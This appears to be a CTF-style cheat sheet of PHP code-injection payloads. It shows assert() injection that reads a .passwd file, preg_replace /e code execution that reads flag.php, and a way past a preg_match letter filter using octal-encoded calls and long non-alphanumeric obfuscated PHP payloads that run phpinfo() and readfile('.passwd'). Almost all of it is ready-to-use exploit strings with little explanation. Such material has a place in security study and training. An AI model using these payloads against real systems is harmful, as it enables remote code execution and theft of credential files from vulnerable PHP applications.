PHP Functions

Assert()

# The assert() function will execute code in params
# Example using challenge
?page=..
Warning : assert() : Assertion "strpos(’includes/...php’, ’..’) === false" failed in path/index.php on line 8

# The request looks like this
assert("strpos('includes/' . $_GET['page'] . '.php', '..') === false")

# If we inject this
?page=salade.php','..') || print('tomate') || strpos('oignons

# The request will look like
assert("strpos('/includes/salade.php','..') || print('tomate') || strpos('oignons.php','..') ===false")

# Then, to exploit
?page=salade.php','..') || show_source('.passwd') || strpos('oignons

PHP preg_replace()

# In PHP, regular expressions need delimiter
preg_match("recherche","contenu"); # wrong
preg_match("/recherche/","contenu"); # OK

# preg_replace offers an option to execute code
preg_replace("input1search","input2replace","input3content");
preg_replace("/a/e","print(123)","abcd");
preg_replace("/a/e","print_r(scandir('.'))","abcd");
preg_replace("/a/e","file_get_contents('flag.php')","abcd");

PHP preg_match()

# It is possible to bypass some functions like preg_match by injecting non-alphanumeric char
# If the application uses eval() on the user input, the payload will still be executed

# Application code
if(!preg_match('/[a-zA-Z`]/', $_POST['input'])){
        print '<fieldset><legend>Result</legend>';
        eval('print '.$_POST['input'].";");
        print '</fieldset>';
    }
    

# Exploitation and Bypass
# You can encode the payload in octal
 file_get_contents(".passwd")
 "\146\151\154\145\137\147\145\164\137\143\157\156\164\145\156\164\163"("\056\160\141\163\163\167\144")

# You can also use non alphanumeric char (https://github.com/v1ll41n/Und3rCov3r)
echo -n “phpinfo(); > tmp.php
php Und3rCov3r.ph 1 tmp.php

# If will create an alphax.php file containing the encoded payload
$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$______________=+_;$______++;$_______++;$_______++;$________++;$________++;$________++;$_________++;$_________++;$_________++;$_________++;$__________++;$__________++;$__________++;$__________++;$__________++;$___________++;$___________++;$___________++;$___________++;$___________++;$___________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;
$__('$_="'.$___.$______.$___________.$______________.$___.$______.$__________.$______________.$___.$______.$___________.$______________.$___.$______.$__________.$______.$___.$______.$__________.$___________.$___.$______.$_________.$___________.$___.$______.$__________.$____________.$___.$__________.$______________.$___.$__________.$______.$___.$____________.$________.'"');$__($_);

# You can then for example read file
 readfile(".passwd");
$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$______________=+_;$______++;$_______++;$_______++;$________++;$________++;$________++;$_________++;$_________++;$_________++;$_________++;$__________++;$__________++;$__________++;$__________++;$__________++;$___________++;$___________++;$___________++;$___________++;$___________++;$___________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;
$__('$_="'.$___.$______.$___________.$_______.$___.$______.$_________.$__________.$___.$______.$_________.$______.$___.$______.$_________.$_________.$___.$______.$_________.$___________.$___.$______.$__________.$______.$___.$______.$__________.$_________.$___.$______.$_________.$__________.$___.$__________.$______________.$___.$_________.$_______.$___.$__________.$___________.$___.$______.$___________.$______________.$___.$______.$_________.$______.$___.$______.$___________.$________.$___.$______.$___________.$________.$___.$______.$___________.$____________.$___.$______.$_________.$_________.$___.$_________.$_______.$___.$__________.$______.$___.$____________.$________.'"');$__($_);